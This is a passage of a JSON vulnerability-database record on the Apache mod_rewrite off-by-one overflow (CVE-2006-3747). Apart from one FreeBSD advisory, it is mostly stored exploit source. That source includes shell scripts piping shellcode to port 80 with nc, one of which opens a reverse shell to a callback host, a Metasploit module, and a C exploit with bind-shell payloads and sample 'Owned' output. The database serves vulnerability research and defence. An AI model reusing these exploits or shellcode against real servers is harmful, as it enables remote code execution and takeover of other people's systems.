e\\x61\\x78\\x6d\\x67\\x78\\x73\\x32\\x42\\x75\\x52\\\n\\x4a\\x75\\x52\\x6b\\x4f\\x7a\\x70\\x61\\x78\\x6b\\x69\\x55\\x59\\x6c\\x35\\x6e\\\n\\x4d\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x70\\x53\\x50\\x53\\x56\\x33\\x76\\x33\\x43\\\n\\x73\\x32\\x73\\x31\\x53\\x52\\x73\\x6b\\x4f\\x4a\\x70\\x70\\x68\\x6f\\x30\\x6d\\\n\\x78\\x35\\x50\\x46\\x61\\x30\\x66\\x30\\x68\\x76\\x64\\x6c\\x42\\x33\\x56\\x70\\\n\\x53\\x4e\\x69\\x78\\x61\\x4c\\x55\\x75\\x38\\x4a\\x4c\\x58\\x79\\x4c\\x6a\\x73\\\n\\x50\\x53\\x67\\x6b\\x4f\\x6a\\x76\\x73\\x5a\\x72\\x30\\x73\\x61\\x53\\x65\\x4b\\\n\\x4f\\x6a\\x70\\x52\\x46\\x31\\x7a\\x52\\x44\\x73\\x56\\x50\\x68\\x51\\x73\\x50\\\n\\x6d\\x32\\x4a\\x62\\x70\\x51\\x49\\x47\\x59\\x6a\\x6c\\x6c\\x49\\x4b\\x57\\x42\\\n\\x4a\\x73\\x74\\x6d\\x59\\x6d\\x32\\x35\\x61\\x6f\\x30\\x48\\x73\\x4f\\x5a\\x6f\\\n\\x65\\x4c\\x49\\x39\\x6d\\x4b\\x4e\\x33\\x72\\x54\\x6d\\x6b\\x4e\\x33\\x72\\x34\\\n\\x6c\\x6c\\x4d\\x50\\x7a\\x57\\x48\\x4e\\x4b\\x4c\\x6b\\x6c\\x6b\\x71\\x78\\x32\\\n\\x52\\x6b\\x4e\\x6c\\x73\\x42\\x36\\x49\\x6f\\x73\\x45\\x65\\x78\\x6b\\x4f\\x6e\\\n\\x36\\x71\\x4b\\x42\\x77\\x43\\x62\\x53\\x61\\x76\\x31\\x70\\x51\\x30\\x6a\\x35\\\n\\x51\\x62\\x71\\x76\\x31\\x72\\x75\\x43\\x61\\x4b\\x4f\\x6e\\x30\\x73\\x58\\x4e\\\n\\x4d\\x7a\\x79\\x37\\x75\\x38\\x4e\\x31\\x43\\x4b\\x4f\\x4a\\x76\\x30\\x6a\\x39\\\n\\x6f\\x6b\\x4f\\x70\\x37\\x6b\\x4f\\x6e\\x30\\x45\\x38\\x39\\x77\\x54\\x39\\x79\\\n\\x56\\x71\\x69\\x79\\x6f\\x53\\x45\\x56\\x64\\x69\\x6f\\x69\\x46\\x6b\\x4f\\x62\\\n\\x57\\x6b\\x4c\\x4b\\x4f\\x6a\\x70\\x50\\x68\\x6a\\x50\\x6f\\x7a\\x37\\x74\\x43\\\n\\x6f\\x72\\x73\\x4b\\x4f\\x6a\\x76\\x79\\x6f\\x38\\x50\\x63\\\n\"'`\\\nHTTP/1.0\\r\\n\\\nHost: $host\\r\\n\\r\\n\" | nc -vv $host 80\n\n# milw0rm.com [2007-04-07]", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache 1.3.372.0.592.2.3 mod_rewrite - Remote Overflow", "edition": 1, "published": "2006-08-21T00:00:00", "title": "Apache 1.3.372.0.592.2.3 mod_rewrite - Remote Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-21T00:00:00", "id": "EXPLOITPACK:8FEEBCD1B617ED74B8D2179061252A44", "href": "", "sourceData": "#!/bin/sh\n# Exploit for Apache mod_rewrite off-by-one.\n# Vulnerability discovered by Mark Dowd.\n# CVE-2006-3747\n# \n# by jack <jack\\x40gulcas\\x2Eorg>\n# 2006-08-20\n#\n# Thx to xuso for help me with the shellcode.\n#\n# I suppose that you've the \"RewriteRule kung/(.*) $1\" rule if not\n# you must recalculate adressess.\n#\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\n# for avoiding apache url-escape.. Take a look is quite nice ;)\n#\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\n# 0x0834ae77 for any other version/system find it.\n#\n# Gulcas rulez :P\n\necho -e \"mod_rewrite apache off-by-one overflow\"\necho \"by jack <jack\\x40gulcas\\x2eorg>\\n\\n\"\n\nif [ $# -ne 1 ] ; then\n echo \"Usage: $0 webserver\"\n exit\nfi\n\nhost=$1\n\necho -ne \"GET /kung/ldap://localhost/`perl -e 'print \"%90\"x128'`%89%e6\\\n%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\\n%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\\n%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\\n%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\\n%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\\n%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\\n%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\\n%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\\n%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\\nHost: $host\\r\\n\\r\\n\" | nc $host 80\n\n# milw0rm.com [2006-08-21]", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "\nThe Apache Software Foundation and The Apache HTTP Server\n\t Project reports:\n\nAn off-by-one flaw exists in the Rewrite module,\n\t mod_rewrite, as shipped with Apache 1.3 since 1.3.28, 2.0\n\t since 2.0.46, and 2.2 since 2.2.0.\nDepending on the manner in which Apache HTTP Server was\n\t compiled, this software defect may result in a\n\t vulnerability which, in combination with certain types of\n\t Rewrite rules in the web server configuration files, could\n\t be triggered remotely. For vulnerable builds, the nature\n\t of the vulnerability can be denial of service (crashing of\n\t web server processes) or potentially allow arbitrary code\n\t execution. This issue has been rated as having important\n\t security impact by the Apache HTTP Server Security Team.\nThis flaw does not affect a default installation of\n\t Apache HTTP Server. Users who do not use, or have not\n\t enabled, the Rewrite module mod_rewrite are not affected\n\t by this issue. This issue only affects installations using\n\t a Rewrite rule with the following characteristics:\n\nThe RewriteRule allows the attacker to control the\n\t initial part of the rewritten URL (for example if the\n\t substitution URL starts with $1)\nThe RewriteRule flags do NOT include any of the\n\t following flags: Forbidden (F), Gone (G), or NoEscape\n\t (NE).\n\nPlease note that ability to exploit this issue is\n\t dependent on the stack layout for a particular compiled\n\t version of mod_rewrite. If the compiler used to compile\n\t Apache HTTP Server has added padding to the stack\n\t immediately after the buffer being overwritten, it will\n\t not be possible to exploit this issue, and Apache HTTP\n\t Server will continue operating normally.\nThe Apache HTTP Server project thanks Mark Dowd of McAfee\n\t Avert Labs for the responsible reporting of this\n\t vulnerability.\n\n", "edition": 4, "modified": "2006-11-01T00:00:00", "published": "2006-07-27T00:00:00", "id": "DC8C08C7-1E7C-11DB-88CF-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html", "title": "apache -- mod_rewrite buffer overflow vulnerability", "type": "freebsd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:04", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Apache module mod_rewrite LDAP protocol Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83108", "href": "https://packetstormsecurity.com/files/83108/Apache-module-mod_rewrite-LDAP-protocol-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow', \n'Description' => %q{ \nThis module exploits the mod_rewrite LDAP protocol scheme handling \nflaw discovered by Mark Dowd, which produces an off-by-one overflow. \nApache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. \nThis module requires REWRITEPATH to be set accurately. In addition, \nthe target must have 'RewriteEngine on' configured, with a specific \n'RewriteRule' condition enabled to allow for exploitation. \n \nThe flaw affects multiple platforms, however this module currently \nonly supports Windows based installations. \n}, \n'Author' => 'patrick', \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-3747' ], \n[ 'OSVDB', '27588' ], \n[ 'BID', '19204' ], \n[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/3680' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/3996' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/2237' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Platform' => ['win'], # 'linux'], \n'Payload' => \n{ \n'Space' => 636, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n'StackAdjustment' => -3500, \n'DisableNops' => 'True', \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ], # patrickw tested OK 20090310 win32 \n], \n'DisclosureDate' => 'Jul 28 2006', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('REWRITEPATH', [true, \"The mod_rewrite URI path\", \"rewrite_path\"]), \n], self.class) \nend \n \ndef autofilter \nreturn false \nend \n \ndef check \nres = send_request_raw({ \n'uri' => '/', \n'version' => '1.1', \n}, 2) \n \nif (res.to_s =~ /Apache/) # This could be smarter. \nreturn Exploit::CheckCode::Detected \nend \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \n# On Linux Apache, it is possible to overwrite EIP by \n# sending ldap://<buf> ... TODO patrickw \n \ntrigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90' \n \nprint_status(\"Sending payload.\") \nsend_request_raw({ \n'uri' => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded, \n'version' => '1.0', \n}, 2) \nhandler \nend \nend \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83108/apache_mod_rewrite_ldap.rb.txt"}, {"lastseen": "2016-12-05T22:18:10", "description": "", "published": "2007-04-07T00:00:00", "type": "packetstorm", "title": "modrewrite-offbyone.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-04-07T00:00:00", "id": "PACKETSTORM:55727", "href": "https://packetstormsecurity.com/files/55727/modrewrite-offbyone.txt.html", "sourceData": "`#!/bin/sh \n# Exploit for Apache mod_rewrite off-by-one(Win32). \n# \n# by axis <axis@ph4nt0m> \n# http://www.ph4nt0m.org \n# 2007-04-06 \n# \n# Tested on Apache 2.0.58 (Win32) \n# Windows2003 CN SP1 \n# \n# Vulnerable Apache Versions: \n# * 1.3 branch: >1.3.28 and <1.3.37 \n# * 2.0 branch: >2.0.46 and <2.0.59 \n# * 2.2 branch: >2.2.0 and <2.2.3 \n# \n# \n# Vulnerability discovered by Mark Dowd. \n# CVE-2006-3747 \n# \n# first POC by jack <jack\\x40gulcas\\x2Eorg> \n# 2006-08-20 \n# http://www.milw0rm.com/exploits/2237 \n# \n# \n# \n# to successfully exploit the vuln,there are some conditions \n# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html \n# \n# \n# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat \n# \n# for more details about the vuln please see: \n# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded \n# \n# \n# no opcodes needed under windows! \n# it will directly run our shellcode \n# \n# my apache config file \n# [httpd.conf]: \n# RewriteEngine on \n# RewriteRule 1/(.*) $1 \n# RewriteLog \"logs/rewrite.log\" \n# RewriteLogLevel 3 \n# \n# \n# Usage: \n# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141 \n# mod_rewrite apache off-by-one overflow \n# \n# [axis@opensystemX axis]$ nc -vv -n -l -p 1154 \n# listening on [any] 1154 ... \n# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077 \n# Microsoft Windows [?? 5.2.3790] \n# (C) ??D 1985-2003 Microsoft Corp. \n# \n# D:\\Apache\\Apache2>exit \n# exit \n# sent 5, rcvd 100 \n# \n# \n# \n# shellcode badchar\u00f5\u00f4 \n# badchar 0x3f 0x0b shellcode \n# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b \n# \n \n \necho -e \"mod_rewrite apache off-by-one overflow\" \n \n \nif [ $# -ne 1 ] ; then \necho \"Usage: $0 webserver\" \nexit \nfi \n \nhost=$1 \n \n#use ldap:// to trigger the vuln, \"Ph4nt0m\" is any arbitrary string \necho -ne \"GET /1/ldap://ph4nt0m/`perl -e 'print \"Ph4nt0m\"x5'`\\ \n# %3f to trigger the vuln \n%3fA%3fA%3f\\ \n#string \"CCCC..\" is any arbitrary string, use %3f to trigger the vuln \n#%90 is the machine code we will jmp to(NOP),run shellcode from here \n`perl -e 'print \"C\"x10'`%3fC%3f%90\\ \n# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded \n`perl -e 'print \"\\ \n\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\ \n\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x63\\ \n\\x58\\x30\\x42\\x30\\x50\\x42\\x6b\\x42\\x41\\x73\\x42\\x32\\x42\\x41\\x41\\x32\\ \n\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x79\\x6c\\x51\\ \n\\x7a\\x6a\\x4b\\x50\\x4d\\x4d\\x38\\x6b\\x49\\x79\\x6f\\x49\\x6f\\x6b\\x4f\\x65\\ \n\\x30\\x4c\\x4b\\x72\\x4c\\x45\\x74\\x51\\x34\\x4e\\x6b\\x71\\x55\\x77\\x4c\\x6c\\ \n\\x4b\\x33\\x4c\\x64\\x45\\x33\\x48\\x64\\x41\\x5a\\x4f\\x4c\\x4b\\x72\\x6f\\x36\\ \n\\x78\\x4c\\x4b\\x73\\x6f\\x45\\x70\\x66\\x61\\x4a\\x4b\\x53\\x79\\x4e\\x6b\\x44\\ \n\\x74\\x4e\\x6b\\x73\\x31\\x38\\x6e\\x55\\x61\\x79\\x50\\x6c\\x59\\x6c\\x6c\\x4b\\ \n\\x34\\x6f\\x30\\x74\\x34\\x34\\x47\\x59\\x51\\x5a\\x6a\\x76\\x6d\\x76\\x61\\x6f\\ \n\\x32\\x5a\\x4b\\x79\\x64\\x55\\x6b\\x33\\x64\\x51\\x34\\x41\\x38\\x30\\x75\\x4b\\ \n\\x55\\x6e\\x6b\\x33\\x6f\\x44\\x64\\x46\\x61\\x7a\\x4b\\x32\\x46\\x6e\\x6b\\x34\\ \n\\x4c\\x42\\x6b\\x6e\\x6b\\x73\\x6f\\x77\\x6c\\x54\\x41\\x58\\x6b\\x43\\x33\\x74\\ \n\\x6c\\x6c\\x4b\\x4d\\x59\\x50\\x6c\\x74\\x64\\x75\\x4c\\x52\\x41\\x6f\\x33\\x50\\ \n\\x31\\x6b\\x6b\\x72\\x44\\x4c\\x4b\\x50\\x43\\x66\\x50\\x6c\\x4b\\x33\\x70\\x64\\ \n\\x4c\\x6c\\x4b\\x74\\x30\\x65\\x4c\\x4e\\x4d\\x4e\\x6b\\x53\\x70\\x47\\x78\\x33\\ \n\\x6e\\x51\\x78\\x4c\\x4e\\x52\\x6e\\x56\\x6e\\x58\\x6c\\x50\\x50\\x59\\x6f\\x79\\ \n\\x46\\x70\\x66\\x62\\x73\\x75\\x36\\x75\\x38\\x66\\x53\\x64\\x72\\x42\\x48\\x53\\ \n\\x47\\x32\\x53\\x50\\x32\\x71\\x4f\\x71\\x44\\x49\\x6f\\x48\\x50\\x52\\x48\\x5a\\ \n\\x6b\\x48\\x6d\\x6b\\x4c\\x65\\x6b\\x70\\x50\\x4b\\x4f\\x68\\x56\\x61\\x4f\\x4e\\ \n\\x69\\x4a\\x45\\x30\\x66\\x6e\\x61\\x78\\x6d\\x67\\x78\\x73\\x32\\x42\\x75\\x52\\ \n\\x4a\\x75\\x52\\x6b\\x4f\\x7a\\x70\\x61\\x78\\x6b\\x69\\x55\\x59\\x6c\\x35\\x6e\\ \n\\x4d\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x70\\x53\\x50\\x53\\x56\\x33\\x76\\x33\\x43\\ \n\\x73\\x32\\x73\\x31\\x53\\x52\\x73\\x6b\\x4f\\x4a\\x70\\x70\\x68\\x6f\\x30\\x6d\\ \n\\x78\\x35\\x50\\x46\\x61\\x30\\x66\\x30\\x68\\x76\\x64\\x6c\\x42\\x33\\x56\\x70\\ \n\\x53\\x4e\\x69\\x78\\x61\\x4c\\x55\\x75\\x38\\x4a\\x4c\\x58\\x79\\x4c\\x6a\\x73\\ \n\\x50\\x53\\x67\\x6b\\x4f\\x6a\\x76\\x73\\x5a\\x72\\x30\\x73\\x61\\x53\\x65\\x4b\\ \n\\x4f\\x6a\\x70\\x52\\x46\\x31\\x7a\\x52\\x44\\x73\\x56\\x50\\x68\\x51\\x73\\x50\\ \n\\x6d\\x32\\x4a\\x62\\x70\\x51\\x49\\x47\\x59\\x6a\\x6c\\x6c\\x49\\x4b\\x57\\x42\\ \n\\x4a\\x73\\x74\\x6d\\x59\\x6d\\x32\\x35\\x61\\x6f\\x30\\x48\\x73\\x4f\\x5a\\x6f\\ \n\\x65\\x4c\\x49\\x39\\x6d\\x4b\\x4e\\x33\\x72\\x54\\x6d\\x6b\\x4e\\x33\\x72\\x34\\ \n\\x6c\\x6c\\x4d\\x50\\x7a\\x57\\x48\\x4e\\x4b\\x4c\\x6b\\x6c\\x6b\\x71\\x78\\x32\\ \n\\x52\\x6b\\x4e\\x6c\\x73\\x42\\x36\\x49\\x6f\\x73\\x45\\x65\\x78\\x6b\\x4f\\x6e\\ \n\\x36\\x71\\x4b\\x42\\x77\\x43\\x62\\x53\\x61\\x76\\x31\\x70\\x51\\x30\\x6a\\x35\\ \n\\x51\\x62\\x71\\x76\\x31\\x72\\x75\\x43\\x61\\x4b\\x4f\\x6e\\x30\\x73\\x58\\x4e\\ \n\\x4d\\x7a\\x79\\x37\\x75\\x38\\x4e\\x31\\x43\\x4b\\x4f\\x4a\\x76\\x30\\x6a\\x39\\ \n\\x6f\\x6b\\x4f\\x70\\x37\\x6b\\x4f\\x6e\\x30\\x45\\x38\\x39\\x77\\x54\\x39\\x79\\ \n\\x56\\x71\\x69\\x79\\x6f\\x53\\x45\\x56\\x64\\x69\\x6f\\x69\\x46\\x6b\\x4f\\x62\\ \n\\x57\\x6b\\x4c\\x4b\\x4f\\x6a\\x70\\x50\\x68\\x6a\\x50\\x6f\\x7a\\x37\\x74\\x43\\ \n\\x6f\\x72\\x73\\x4b\\x4f\\x6a\\x76\\x79\\x6f\\x38\\x50\\x63\\ \n\"'`\\ \nHTTP/1.0\\r\\n\\ \nHost: $host\\r\\n\\r\\n\" | nc -vv $host 80 \n \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/55727/modrewrite-offbyone.txt"}, {"lastseen": "2016-12-05T22:20:53", "description": "", "published": "2007-05-31T00:00:00", "type": "packetstorm", "title": "apache2058-rewrite.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-05-31T00:00:00", "id": "PACKETSTORM:56989", "href": "https://packetstormsecurity.com/files/56989/apache2058-rewrite.txt.html", "sourceData": "`/* \napache mod rewrite exploit (win32) \n \nBy: fabio/b0x (oc-192, old CoTS member) \n \nVuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded \n \nCode: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003) \noriginal exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also \nwas a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/ \n \nUsage: ./apache hostname rewrite_path \n \nGreetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard \n \nExample: ./apache 192.168.0.253 test \n[+]Preparing payload \n[+]Connecting... \n[+]Connected \n[+]Sending... \n[+]Sent \n[+]Starting second stage... \n[+]Connecting... \n[+]Connected \n[+]Sending... \n[+]Sent \n[+]Connecting to shell \nMicrosoft Windows [Version 5.2.3790] \n(C) Copyright 1985-2003 Microsoft Corp. \n \nC:\\Program Files\\Apache Group\\Apache2>exit \nexit \n[+]Owned \n*/ \n#include <stdio.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <errno.h> \n#include <string.h> \n#include <netdb.h> \n#include <sys/types.h> \n#include <netinet/in.h> \n#include <sys/socket.h> \n \n#define PORT 80 \n#define PORT2 4444 \n#define MAXDATASIZE 1024 \nchar get[] = \"/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90\"; \nchar shellcode[]= \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\" \n\"\\x48\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x41\" \n\"\\x58\\x50\\x30\\x42\\x30\\x41\\x6b\\x41\\x41\\x51\\x41\\x32\\x41\\x41\\x32\\x42\" \n\"\\x42\\x42\\x30\\x42\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x7a\\x49\\x4b\\x58\\x56\" \n\"\\x36\\x73\\x30\\x43\\x30\\x75\\x50\\x70\\x53\\x66\\x35\\x70\\x56\\x31\\x47\\x4c\" \n\"\\x4b\\x50\\x6c\\x44\\x64\\x55\\x48\\x6c\\x4b\\x73\\x75\\x75\\x6c\\x4c\\x4b\\x61\" \n\"\\x44\\x73\\x35\\x63\\x48\\x35\\x51\\x4b\\x5a\\x6c\\x4b\\x50\\x4a\\x37\\x68\\x6c\" \n\"\\x4b\\x42\\x7a\\x77\\x50\\x37\\x71\\x4a\\x4b\\x6b\\x53\\x44\\x72\\x30\\x49\\x6e\" \n\"\\x6b\\x44\\x74\\x6e\\x6b\\x56\\x61\\x68\\x6e\\x54\\x71\\x39\\x6f\\x6b\\x4c\\x70\" \n\"\\x31\\x4b\\x70\\x6c\\x6c\\x67\\x48\\x6b\\x50\\x54\\x34\\x53\\x37\\x6b\\x71\\x68\" \n\"\\x4f\\x44\\x4d\\x73\\x31\\x78\\x47\\x38\\x6b\\x38\\x72\\x45\\x6b\\x73\\x4c\\x31\" \n\"\\x34\\x46\\x74\\x52\\x55\\x6b\\x51\\x6c\\x4b\\x63\\x6a\\x65\\x74\\x56\\x61\\x7a\" \n\"\\x4b\\x32\\x46\\x4c\\x4b\\x76\\x6c\\x70\\x4b\\x4e\\x6b\\x30\\x5a\\x75\\x4c\\x67\" \n\"\\x71\\x5a\\x4b\\x6e\\x6b\\x74\\x44\\x4e\\x6b\\x57\\x71\\x6b\\x58\\x68\\x6b\\x76\" \n\"\\x62\\x50\\x31\\x4b\\x70\\x33\\x6f\\x53\\x6e\\x31\\x4d\\x63\\x6b\\x4b\\x72\\x65\" \n\"\\x58\\x55\\x50\\x61\\x4e\\x31\\x7a\\x36\\x50\\x42\\x79\\x70\\x64\\x4e\\x6b\\x74\" \n\"\\x59\\x6e\\x6b\\x43\\x6b\\x44\\x4c\\x4c\\x4b\\x51\\x4b\\x77\\x6c\\x4c\\x4b\\x35\" \n\"\\x4b\\x6e\\x6b\\x31\\x4b\\x74\\x48\\x73\\x63\\x63\\x58\\x6c\\x4e\\x70\\x4e\\x44\" \n\"\\x4e\\x78\\x6c\\x79\\x6f\\x4b\\x66\\x4d\\x59\\x6f\\x37\\x4b\\x31\\x78\\x6c\\x33\" \n\"\\x30\\x77\\x71\\x73\\x30\\x47\\x70\\x36\\x37\\x53\\x66\\x51\\x43\\x4d\\x59\\x69\" \n\"\\x75\\x39\\x78\\x56\\x47\\x57\\x70\\x37\\x70\\x37\\x70\\x6e\\x70\\x45\\x51\\x33\" \n\"\\x30\\x37\\x70\\x4c\\x76\\x72\\x39\\x55\\x48\\x7a\\x47\\x6d\\x74\\x45\\x49\\x54\" \n\"\\x30\\x4d\\x39\\x38\\x65\\x77\\x39\\x4b\\x36\\x50\\x49\\x6c\\x64\\x35\\x4a\\x52\" \n\"\\x50\\x4f\\x37\\x6c\\x64\\x4c\\x6d\\x76\\x4e\\x4d\\x39\\x4b\\x69\\x45\\x59\\x49\" \n\"\\x65\\x4e\\x4d\\x78\\x4b\\x4a\\x4d\\x6b\\x4c\\x77\\x4b\\x31\\x47\\x50\\x53\\x74\" \n\"\\x72\\x61\\x4f\\x46\\x53\\x67\\x42\\x57\\x70\\x61\\x4b\\x6c\\x4d\\x42\\x6b\\x75\" \n\"\\x70\\x70\\x51\\x6b\\x4f\\x7a\\x77\\x4b\\x39\\x4b\\x6f\\x4f\\x79\\x4f\\x33\\x4e\" \n\"\\x6d\\x71\\x65\\x52\\x34\\x53\\x5a\\x53\\x37\\x30\\x59\\x50\\x51\\x66\\x33\\x4b\" \n\"\\x4f\\x55\\x64\\x4c\\x4f\\x6b\\x4f\\x66\\x35\\x43\\x34\\x50\\x59\\x6e\\x69\\x47\" \n\"\\x74\\x6c\\x4e\\x6a\\x42\\x58\\x72\\x54\\x6b\\x64\\x67\\x72\\x74\\x39\\x6f\\x76\" \n\"\\x57\\x6b\\x4f\\x50\\x55\\x44\\x70\\x30\\x31\\x4b\\x70\\x50\\x50\\x30\\x50\\x50\" \n\"\\x50\\x32\\x70\\x77\\x30\\x46\\x30\\x53\\x70\\x70\\x50\\x49\\x6f\\x63\\x65\\x66\" \n\"\\x4c\\x4b\\x39\\x4f\\x37\\x30\\x31\\x6b\\x6b\\x33\\x63\\x71\\x43\\x42\\x48\\x54\" \n\"\\x42\\x63\\x30\\x76\\x71\\x63\\x6c\\x4c\\x49\\x6d\\x30\\x52\\x4a\\x32\\x30\\x32\" \n\"\\x70\\x36\\x37\\x59\\x6f\\x52\\x75\\x71\\x34\\x50\\x53\\x70\\x57\\x4b\\x4f\\x72\" \n\"\\x75\\x44\\x68\\x61\\x43\\x62\\x74\\x33\\x67\\x59\\x6f\\x63\\x65\\x67\\x50\\x4c\" \n\"\\x49\\x38\\x47\\x6d\\x51\\x5a\\x4c\\x53\\x30\\x36\\x70\\x53\\x30\\x33\\x30\\x4e\" \n\"\\x69\\x4b\\x53\\x53\\x5a\\x43\\x30\\x72\\x48\\x53\\x30\\x34\\x50\\x33\\x30\\x33\" \n\"\\x30\\x50\\x53\\x76\\x37\\x6b\\x4f\\x36\\x35\\x74\\x58\\x6e\\x61\\x4a\\x4c\\x67\" \n\"\\x70\\x35\\x54\\x33\\x30\\x63\\x30\\x49\\x6f\\x78\\x53\\x41\"; \n \n \nchar finish[]= \"HTTP/1.0\\r\\nHost: \"; \n \nchar payload2[]= \n\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x18\" \n\"\\xd9\\x03\\x3a\\x83\\xeb\\xfc\\xe2\\xf4\\xe4\\xb3\\xe8\\x77\\xf0\\x20\\xfc\\xc5\" \n\"\\xe7\\xb9\\x88\\x56\\x3c\\xfd\\x88\\x7f\\x24\\x52\\x7f\\x3f\\x60\\xd8\\xec\\xb1\" \n\"\\x57\\xc1\\x88\\x65\\x38\\xd8\\xe8\\x73\\x93\\xed\\x88\\x3b\\xf6\\xe8\\xc3\\xa3\" \n\"\\xb4\\x5d\\xc3\\x4e\\x1f\\x18\\xc9\\x37\\x19\\x1b\\xe8\\xce\\x23\\x8d\\x27\\x12\" \n\"\\x6d\\x3c\\x88\\x65\\x3c\\xd8\\xe8\\x5c\\x93\\xd5\\x48\\xb1\\x47\\xc5\\x02\\xd1\" \n\"\\x1b\\xf5\\x88\\xb3\\x74\\xfd\\x1f\\x5b\\xdb\\xe8\\xd8\\x5e\\x93\\x9a\\x33\\xb1\" \n\"\\x58\\xd5\\x88\\x4a\\x04\\x74\\x88\\x7a\\x10\\x87\\x6b\\xb4\\x56\\xd7\\xef\\x6a\" \n\"\\xe7\\x0f\\x65\\x69\\x7e\\xb1\\x30\\x08\\x70\\xae\\x70\\x08\\x47\\x8d\\xfc\\xea\" 